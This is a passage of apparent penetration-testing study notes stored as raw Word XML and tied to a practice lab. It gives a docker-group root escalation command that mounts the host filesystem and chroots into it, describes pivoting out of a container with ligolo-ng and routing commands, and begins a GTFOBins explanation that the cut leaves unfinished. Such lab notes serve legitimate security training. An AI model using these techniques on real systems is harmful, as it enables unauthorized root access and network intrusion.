        </w:rPr>
        <w:t xml:space="preserve">docker run -v /:/mnt --rm -it alpine chroot /mnt sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="806"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However this assumes alpine is a docker image you already have. Here, it worked, but in another writeup, we had to replace alpine with another docker image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can do a similar thing if you see a user part of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">lxd </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">group. Some groups that are tied to services/binaries can be exploited since being in that group allows for running of binaries as root (in-directly through the daemon)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E44">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E45">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E46">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_htcko022jmwe" w:id="258"/>
      <w:bookmarkEnd w:id="258"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to tell if you are currently inside of a Docker container instead of an actual machine and how to escape using ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E47">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId638">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">SkillForce</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG practice, we used a script to get RCE, but then we realized we weren't inside the actual machine but rather a Docker Container, and we need to escape.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4A">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon further analysis, we discover that the environment we have gained access to is actually a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Docker container</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, rather than the actual host system. This becomes evident when inspecting the root directory, where we observe files such as</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.dockerenv</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">entrypoint.sh</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which are strong indicators of a containerized environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this in mind, our next objective is to identify a method to escape the container and gain access to the underlying host machine. One technique we can use to pivot from the container to the host or other internal systems is by leveraging tunneling tools such as </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ligolo-ng</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This tool allows us to establish a connection that effectively bridges the container’s internal network with our attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By setting up a ligolo-ng agent within the container and connecting it back to our listener, we gain the ability to route traffic through the container. This enables us to perform </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internal network reconnaissance</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, such as scanning for other potentially vulnerable hosts or services that are not exposed externally.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before proceeding with Ligolo-ng, we need to identify the network interface within the container that we want to route our traffic through. This can be done by running ifconfig inside the container:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E4F">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp $ </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E50">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eth0      Link encap:Ethernet  HWaddr DE:AE:70:DC:FF:B4  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E51">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  inet addr:172.18.0.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  Bcast:172.18.255.255  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mask:255.255.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E52">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E53">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          RX packets:1272 errors:0 dropped:0 overruns:0 frame:0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E54">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          TX packets:1174 errors:0 dropped:0 overruns:0 carrier:0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E55">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          collisions:0 txqueuelen:0 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E56">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">          RX bytes:4636092 (4.4 MiB)  TX bytes:689520 (673.3 KiB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E57">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E58">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the output above, we observe that the container is using the eth0 interface with an IP address of</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 172.18.0.2</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This confirms that the container is on the 172.18.0.0/16 Docker bridge network.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E59">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To route traffic through Ligolo and access the internal network, we use the following command on our attacking machine:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo ip route add 172.18.0.0/16 dev ligolo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1323"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the Mask is only on the first 2 octets, not the first 3, so it's /16 and not /24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">At this point, the tunnel is established, and we can begin routing traffic through the container, allowing us to scan the internal network and interact with other potentially vulnerable services. We can start this on by doing an nmap ping sweep.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E5F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E60">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E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62">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E63">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iidf4f9xxsnt" w:id="259"/>
      <w:bookmarkEnd w:id="259"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins / Binary (Unix Binaries)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E64">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E65">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explanation of each section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E66">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section is used when you just want a shell, nothing more</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E67">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section is used for when you run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and see a binary (/usr/bin) or when you look at the output of LinPeas and see something under the SUDO section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001E68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="396"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SUID</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> section is used for when you run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
